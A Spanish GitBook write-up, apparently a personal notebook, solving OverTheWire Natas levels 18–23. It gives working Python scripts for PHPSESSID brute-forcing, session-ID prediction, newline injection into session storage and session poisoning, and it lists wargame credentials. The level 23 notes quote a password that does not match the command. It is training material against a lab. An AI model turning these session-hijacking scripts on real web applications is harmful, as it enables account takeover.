beafn28
  • 👩‍💻¡Bienvenidos a mi HackBook!
  • WRITEUPS
    • DockerLabs
      • BuscaLove
      • Amor
      • Injection
      • BorazuwarahCTF
      • Trust
      • Picadilly
      • Pinguinazo
      • AguaDeMayo
      • BreakMySSH
      • NodeClimb
      • Move
      • Los 40 ladrones
      • Vulnvault
      • Pntopntobarra
      • Library
      • Escolares
      • ConsoleLog
      • Vacaciones
      • Obsession
      • FirstHacking
      • SecretJenkins
      • HedgeHog
      • AnonymousPingu
      • ChocolateLovers
      • Dockerlabs
      • Pressenter
      • Candy
      • JenkHack
      • ShowTime
      • Upload
      • Verdejo
      • WalkingCMS
      • WhereIsMyWebShell
      • Whoiam
      • Winterfell
      • -Pn
      • Psycho
      • Mirame
      • Backend
      • Paradise
      • Balurero
      • Allien
      • Vendetta
      • FindYourStyle
      • Stellarjwt
      • File
      • Redirection (Por completar)
      • Extraviado
      • Patriaquerida
      • Tproot
      • Internship
      • Walking Dead
      • Bicho (Por completar)
      • BaluFood
    • TryHackMe
      • Brooklyn Nine Nine
      • Blue
    • HackTheBox
      • Nibbles
      • Starting Point
        • Meow
        • Fawn
        • Dancing
        • Redeemer
        • Appointment
        • Sequel
        • Crocodile
        • Responder
        • Three
        • Archetype
        • Oopsie
        • Vaccine
        • Unified
        • Explosion
        • Preignition
        • Mongod
        • Synced
        • Ignition
        • Bike
        • Funnel
        • Pennyworth
        • Tactics
        • Included
        • Markup
        • Base
      • BoardLight
      • Cap
      • TwoMillion
      • Lame
      • Legacy
      • Devel
      • Beep
      • Optimum
      • Arctic
      • Jerry
      • Sau
      • GoodGames
      • Challenges
        • Emdee five for life
        • MarketDump
      • Intro to Dante
      • Heist
      • OpenAdmin
      • Nest
      • Curling
    • Vulnhub
      • Wakanda
      • Election (Por terminar)
    • The Hacker Labs
      • Avengers
      • Can you hack me?
      • Fruits
      • Microchoft
      • TickTakRoot
      • Grillo
      • Mortadela
      • Zapas Guapas
      • Sal y Azúcar
      • Cyberpunk
      • Papafrita
      • PizzaHot
      • Decryptor
      • Academy
      • Cocido andaluz
      • Find Me
      • Quokka
      • Campana Feliz
      • Bocata de Calamares
      • Casa Paco
      • Torrijas
    • Vulnyx
      • Fuser
      • Blogguer
      • Lower
      • Exec
      • Diff3r3ntS3c
      • Hacking Station
      • Experience
      • Eternal
      • Agent
      • Infected
      • Admin
      • War
      • Hosting
    • OverTheWire
      • Natas
        • Nivel 0-5
        • Nivel 6-11
        • Nivel 12-17
        • Nivel 18-23
        • Nivel 24-29
        • Nivel 30-34
      • Leviathan
        • Nivel 0-7
      • Krypton
      • Bandit
        • Nivel 0-10
        • Nivel 11-20
        • Nivel 21-30
        • Nivel 31-34
    • Proving Ground Play
      • Monitoring
      • DriftingBlues6
  • APUNTES HACKING
    • Pentesting Basics
      • Web Enumeration
      • Public Exploits
      • Types of Shells
      • Privilege Escalation
      • Transfering Files
    • Network Enumeration with NMAP
      • Host Discovery
      • Host and Port Scanning
      • Saving the Results
      • Service Enumeration
      • Nmap Scripting Engine
      • Performance
      • Firewall and IDS/IPS Evasion
    • Footprinting
      • Domain Information
      • Cloud Resources
      • FTP
      • SMB
      • NFS
      • DNS
      • SMTP
      • IMAP/POP3
      • SNMP
      • MySQL
      • MSSQL
      • Oracle TNS
      • IPMI
      • Linux Remote Management Protocols
      • Windows Remote Management Protocols
    • Information Gathering - Web Edition
      • WHOIS
      • DNS
        • Digging DNS
      • Subdomains
        • Subdomain Bruteforcing
        • DNS Zone Transfers
        • Virtual Hosts
        • Certificate Transparency Logs
      • Fingerprinting
      • Crawling
        • robots.txt
        • Well-Known URIs
        • Creepy Crawlies
      • Search Engine Discovery
      • Web Archives
      • Automating Recon
    • Vulnerability Assessment
      • Vulnerability Assessment
      • Assessment Standards
      • Common Vulnerability Scoring System (CVSS)
      • Common Vulnerabilities and Exposures (CVE)
    • Nessus
      • Getting Started with Nessus
      • Nessus Scan
      • Advanced Settings
      • Working with Nessus Scan Output
      • Scanning Issues
    • OpenVAS
      • OpenVAS Scan
      • Exporting The Results
    • Reporting
    • File Transfers
      • Windows File Transfer Methods
      • Linux File Transfer Methods
      • Transferring Files with Code
      • Miscellaneous File Transfer Methods
      • Protected File Transfers
      • Catching Files over HTTP/S
      • Living off The Land
      • Detection
      • Evading Detection
    • Shells & Payloads
      • Anatomy of a Shell
      • Bind Shells
      • Reverse Shells
      • Payloads
        • Automating Payloads & Delivery with Metasploit
        • Crafting Payloads with MSFvenom
        • Infiltrating Windows
        • Infiltrating Unix/Linux
        • Spawning Interactive Shells
      • Introduction to Web Shells
        • Laudanum, One Webshell to Rule Them All
        • Antak Webshell
        • PHP Web Shells
      • Detection & Prevention
    • Metasploit
      • MSFConsole
      • Modules
      • Targets
      • Payloads
      • Encoders
      • Databases
      • Plugins
      • Sessions
      • Meterpreter
      • Writing and Importing Modules
      • Introduction to MSFVenom
      • Firewall and IDS/IPS Evasion
    • Password Attacks
      • John The Ripper
      • Network Services
      • Password Mutations
      • Password Reuse / Default Passwords
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
      • Pass the Hash (PtH)
  • WEB SECURITY
    • Path Traversal
    • SQL Injection
    • Control de Acceso
  • Mis CTFs
    • Pequeñas Mentirosas
    • CryptoLabyrinth
    • Elevator
    • Facultad
  • PREPARAR EJPTv2
    • Máquinas
    • Curso de Mario
      • Presentación + Preparación de Laboratorios
      • Conceptos Básicos de Hacking
      • Explotación de Vulnerabilidades y Ataques de Fuerza Bruta
      • Explotación vulnerabilidades Web
      • Enumeración y Explotación del Protócolo SMB, SAMBA, SNMP, IIS y RDP
      • Hacking Entornos CMS
      • Escalada de Privilegios + Post Explotación
      • Pivoting con Metasploit
  • Preparar OSCP
    • Información
    • Máquinas
      • Linux
        • Fácil
        • Medio
        • Difícil
      • Windows
        • Fácil
        • Medio
        • Difícil
Powered by GitBook
On this page
  • NIVEL 18
  • NIVEL 19
  • NIVEL 20
  • NIVEL 21
  • NIVEL 22
  • NIVEL 23

Was this helpful?

  1. WRITEUPS
  2. OverTheWire
  3. Natas

Nivel 18-23

PreviousNivel 12-17NextNivel 24-29

Last updated 8 months ago

Was this helpful?

NIVEL 18

Ingresamos las credenciales para el nivel 18.

  • Usuario: natas18

  • Contraseña: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ

Tras iniciar sesión, nos encontramos con la página de inicio del Nivel 18. Se nos muestra en la página para hacer Login con nuestro usuario y contraseña pero que iniciemos sesión con las credenciales típicas admin:admin.

En el código fuente, la directiva

$maxid = 640; 

nos sugiere que el valor de PHPSESSID puede asumir hasta 640 posibles valores. Este número es lo suficientemente bajo como para permitir un ataque de fuerza bruta contra la variable PHPSESSID con el fin de realizar un Session Hijacking. Por lo que realizamos un script que lo haga por nosotros.

import requests

# URL objetivo
target = 'http://natas18.natas.labs.overthewire.org'
# Credenciales para la autenticación básica
auth = ('natas18', '6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ')
# Parámetros de la solicitud
params = dict(username='admin', password='admin')
# Cookies iniciales
cookies = dict()

# Número máximo de IDs de sesión
max_s_id = 640
s_id = 1

while s_id <= max_s_id:
    # Mostrar el ID de sesión actual
    print("Trying with PHPSESSID = " + str(s_id))
    
    # Configurar la cookie PHPSESSID
    cookies = dict(PHPSESSID=str(s_id))
    
    # Realizar la solicitud GET
    r = requests.get(target, auth=auth, params=params, cookies=cookies)
    
    # Verificar si el texto en la respuesta indica que el usuario es administrador
    if "You are an admin" in r.text:
        print(r.text)
        break
    
    # Incrementar el ID de sesión
    s_id += 1

NIVEL 19

Ingresamos las credenciales para el nivel 19.

  • Usuario: natas19

  • Contraseña: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

Tras iniciar sesión, nos encontramos con la página de inicio del Nivel 19. Se nos muestra en la página para hacer Login con nuestro usuario y contraseña. Como los valores de PHPSESSID no siguen un patrón secuencial, es necesario analizar la aleatoriedad para intentar predecirlos. Para lograr esto, debemos recolectar una cantidad significativa de valores de PHPSESSID generados y luego aplicar técnicas estadísticas para entender el patrón.

#!/usr/bin/env python

import requests
import os
import sys

def collect_stat(phpsessid, sess_id):
    for i in range(len(sess_id)):
        char_at_pos = phpsessid[i]
        char_at_pos[sess_id[i]] += 1

def get_max(chars={}):
    max_freq = 0
    max_char = 'a'
    for c in chars:
        if chars[c] >= max_freq:
            max_freq = chars[c]
            max_char = c
    return max_char, max_freq

def print_stat(phpsessid, n_captures):
    i = 0
    for c in phpsessid:
        l, f = get_max(c)
        print(("  char at position %2.1d of PHPSESSID is '%c' with accuracy %2.2f%%") %
              (i, l, (f*100)/n_captures))
        i += 1

target = 'http://natas19.natas.labs.overthewire.org'
auth = ('natas19', 'tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr')
params = dict(username='admin', password='admin')
cookies = dict()

# Recopila PHPSESSIDs
filename = './phpsessids.txt'
i_max = 300
i = 0

if not os.path.exists(filename):
    with open(filename, 'a') as f:
        print('Collecting data (%d requests)' % i_max)
        while i <= i_max:
            r = requests.get(target, auth=auth, params=params, cookies=cookies)
            f.write('%s\n' % r.cookies['PHPSESSID'])
            i += 1
            sys.stderr.write('.')
        sys.stderr.write('\n\n')

# Analiza los IDs recopilados
lens = {}
ids = []
with open(filename) as f:
    ids = f.readlines()
tot = len(ids)

for id in ids:
    k = str(len(id.strip()))
    if k in lens:
        lens[k] += 1
    else:
        lens[k] = 1

print("Just a simple analysis: ")
for k in lens:
    print('  PHPSESSIDs with %s chars: %2.2f%%' % (k, (lens[k] * 100) / tot))

print("")

# Analiza la frecuencia de caracteres
sys.stdout.write('Choose length: ')
l = int(input())

phpsessid = []

for i in range(l):
    phpsessid.append({'0': 0, '1': 0, '2': 0, '3': 0, '4': 0, '5': 0, '6': 0,
                      '7': 0, '8': 0, '9': 0, 'a': 0, 'b': 0, 'c': 0, 'd': 0,
                      'e': 0, 'f': 0})

n_captures = 0

if l is not None:
    for id in ids:
        if len(id.strip()) == l:
            collect_stat(phpsessid, id.strip())
            n_captures += 1

print("\nWith %d captures" % i_max)
print_stat(phpsessid, n_captures)

Descripción del Script

  1. Recopilación de PHPSESSID:

    • Genera una lista de valores PHPSESSID realizando solicitudes al servidor y guarda los valores en un archivo.

  2. Análisis de los IDs recopilados:

    • Calcula el porcentaje de aparición de cada longitud de PHPSESSID.

    • Analiza la frecuencia de caracteres en cada posición de los PHPSESSID para identificar patrones.

  3. Estadísticas:

    • Muestra estadísticas sobre la frecuencia de caracteres en cada posición del PHPSESSID basado en los datos recopilados.

Este script es útil para evaluar la aleatoriedad de los valores PHPSESSID y puede ayudar a predecir futuros valores de sesión.

El análisis muestra que los PHPSESSID de longitud 18 son los más comunes. En los PHPSESSID de longitud 18, varios caracteres tienen una precisión del 100% en sus posiciones respectivas, lo que sugiere que estos caracteres son consistentes y predecibles.

Ahora podemos intentar con un ataque de fuerza bruta porque el rango de soluciones posibles es razonable (16x16x16).

#!/usr/bin/env python

import requests
import sys

# URL objetivo
target = 'http://natas19.natas.labs.overthewire.org'
# Credenciales para la autenticación básica
auth = ('natas19', 'tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr')
# Parámetros de la solicitud
params = dict(username='admin', password='s3cr3t')
# Cookies iniciales
cookies = dict()

# Inicialización de variables
x = 0x0
y = 0x0
z = 0x0

# Bucle para probar diferentes valores de PHPSESSID
while x <= 0xf:
    while y <= 0xf:
        while z <= 0xf:
            # Construir el valor de PHPSESSID
            phpsessid = ('3%s3%s3%s2d61646d696e' % 
                         (hex(x)[2:], hex(y)[2:], hex(z)[2:]))
            cookies['PHPSESSID'] = phpsessid
            print('Trying with: %s' % phpsessid)
            
            # Realizar la solicitud GET
            r = requests.get(target, auth=auth, params=params, cookies=cookies)
            
            # Verificar la respuesta
            if "You are logged in as a regular user." not in r.text:
                print(r.text)
                sys.exit(0)
            
            # Incrementar z
            z += 1
        
        # Incrementar y y reiniciar z
        y += 1
        z = 0x0
    
    # Incrementar x y reiniciar y y z
    x += 1
    y = 0x0
    z = 0x0

# Finalizar el script si no se encontró una sesión válida
sys.exit(1)

NIVEL 20

Ingresamos las credenciales para el nivel 20.

  • Usuario: natas20

  • Contraseña:p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw

Tras iniciar sesión, nos encontramos con la página de inicio del Nivel 20. Se nos muestra en la página para cambiar nuestro nombre pero debemos iniciar sesión como administrador.

En este nivel, es realista decir que el ID de sesión no puede ser predicho. De hecho, parece ser totalmente aleatorio.

Al observar el código fuente, podemos ver que se definieron manejadores personalizados para la gestión del almacenamiento de sesiones. En nuestro caso, los que nos interesan son myread() y mywrite().

En myread() podemos ver que el contenido del archivo de sesión se divide utilizando (salto de línea) como carácter separador.

$_SESSION = array();
foreach(explode("\n", $data) as $line) {
    debug("Read [$line]");
    ...
}

Además, para llenar el array $_SESSION, se espera que cada línea tenga la forma clave valor.

$_SESSION = array();
foreach(explode("\n", $data) as $line) {
    ...
    $parts = explode(" ", $line, 2);
    if($parts[0] != "")
        $_SESSION[$parts[0]] = $parts[1];
}

Para autenticarse como administrador, la página verifica si la sesión contiene la clave admin y si su valor es 1.

function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
        print "You are an admin. The credentials for the next level are:<br>";
        print "<pre>Username: natas21\n";
        print "Password: <censored></pre>";
    } else {
        print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21.";
    }
}

Cuando se envía un parámetro llamado name, se inicializa una nueva sesión y el valor de name se almacena en ella.

import requests

# URL objetivo
target = 'http://natas20.natas.labs.overthewire.org'
# Credenciales 
auth = ('natas20', 'p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw')

# Primera solicitud
print("#")
print("# FIRST REQUEST")
print("#")
params = dict(name='admin\nadmin 1', debug='')  
cookies = dict()
r = requests.get(target, auth=auth, params=params, cookies=cookies)
phpsessid = r.cookies['PHPSESSID']
print(r.text)

print("\n\n")
print("#")
print("# SECOND REQUEST")
print("#")
params = dict(debug='')
cookies = dict(PHPSESSID=phpsessid)
r = requests.get(target, auth=auth, params=params, cookies=cookies)
print(r.text)

Este código realiza un ataque de manipulación de sesión en un desafío de seguridad web.

  1. Primera Solicitud:

    • Envía una solicitud GET a la URL objetivo con los parámetros name='admin\nadmin 1' y debug=''.

    • Este parámetro name incluye un salto de línea (), que puede manipular cómo el servidor trata la información de la sesión.

    • Guarda la cookie de sesión (PHPSESSID) que recibe como respuesta.

  2. Segunda Solicitud:

    • Envía una segunda solicitud GET usando la misma cookie de sesión obtenida en la primera solicitud.

    • Debido a la manipulación de la sesión en la primera solicitud, la segunda puede devolver una respuesta diferente, posiblemente dando acceso a privilegios administrativos o información sensible.

NIVEL 21

Ingresamos las credenciales para el nivel 21.

  • Usuario: natas21

  • Contraseña: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH

Tras iniciar sesión, nos encontramos con la página de inicio del Nivel 21. Se nos muestra que la página ha sido colocada en otra URL por lo que revisamos el código fuente.

La función print_credentials() en la página principal verifica si $_SESSION tiene el parámetro admin y si su valor es igual a 1.

if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas22\n";
    print "Password: <censored></pre>";
} else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.";
}

En la página "experimenter", si $_REQUEST contiene la clave submit, todos los atributos contenidos se guardan en $_SESSION.

if(array_key_exists("submit", $_REQUEST)) {
    foreach($_REQUEST as $key => $val) {
        $_SESSION[$key] = $val;
    }
}

El ataque se define de la siguiente manera: Al pasar admin=1 en la página de "experimenter", podremos obtener la contraseña para Natas22.

import requests

# URL objetivo para enviar el valor admin=1
target = 'http://natas21-experimenter.natas.labs.overthewire.org'
auth = ('natas21', 'BPhv63cKE1lkQl04cE5CuFTzXe15NfiH')

# Enviamos el valor admin=1 en la solicitud
params = dict(debug='', submit='', admin=1)  
cookies = dict()
r = requests.get(target, auth=auth, params=params, cookies=cookies)
phpsessid = r.cookies['PHPSESSID']
print(r.text)

# URL objetivo para verificar el resultado
target = 'http://natas21.natas.labs.overthewire.org'
params = dict(debug='')
cookies = dict(PHPSESSID=phpsessid)
r = requests.get(target, auth=auth, params=params, cookies=cookies)
print(r.text)

Este código realiza dos solicitudes HTTP GET: la primera establece el valor admin=1 en la sesión para obtener la cookie de sesión, y la segunda usa esa cookie para acceder a la página principal y obtener las credenciales para el siguiente nivel.

NIVEL 22

Ingresamos las credenciales para el nivel 22.

  • Usuario: natas22

  • Contraseña: d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz

Tras iniciar sesión, nos encontramos con la página de inicio del Nivel 22. NO se nos muestra nada relevante por lo que revisamos el código fuente.

Viendo el código fuente realizamos este comando:

curl -i -XGET -u natas22:d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz http://natas22.natas.labs.overthewire.org/?revelio
  • Autenticación Básica:

    • curl realiza una solicitud HTTP a la URL especificada utilizando las credenciales de autenticación básica (natas22 y d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz). Esto asegura que solo los usuarios autenticados puedan acceder a la página.

  • Solicitud GET con Parámetro revelio:

    • La solicitud GET se envía a la URL con el parámetro revelio en la cadena de consulta. Según el código PHP proporcionado anteriormente, este parámetro se usa para revelar las credenciales del siguiente nivel si el usuario está autenticado como administrador.

  • Mostrar Encabezados y Respuesta:

    • La opción -i incluye los encabezados HTTP en la respuesta, por lo que puedes ver información adicional sobre la respuesta, como el código de estado HTTP y otros encabezados.

NIVEL 23

Ingresamos las credenciales para el nivel 23.

  • Usuario: natas23

  • Contraseña: dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRs

Tras iniciar sesión, nos encontramos con la página de inicio del Nivel 23. Se nos muestra para ingresar una contraseña por lo que revisamos el código fuente para más información.

Viendo el código fuente realizamos este comando:

curl -XGET -u natas23:dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRs http://natas23.natas.labs.overthewire.org/?passwd=20%20iloveyou
  • Autenticación Básica:

    • -u natas23:D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE

    • Proporciona las credenciales necesarias para autenticar al usuario natas23 con la contraseña D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE.

  • Método GET:

    • -XGET

    • Realiza una solicitud GET al servidor.

  • Parámetro passwd:

    • ?passwd=20%20iloveyou

    • Envía la contraseña 20 iloveyou, que debe cumplir con los requisitos de la página para revelar las credenciales del siguiente nivel.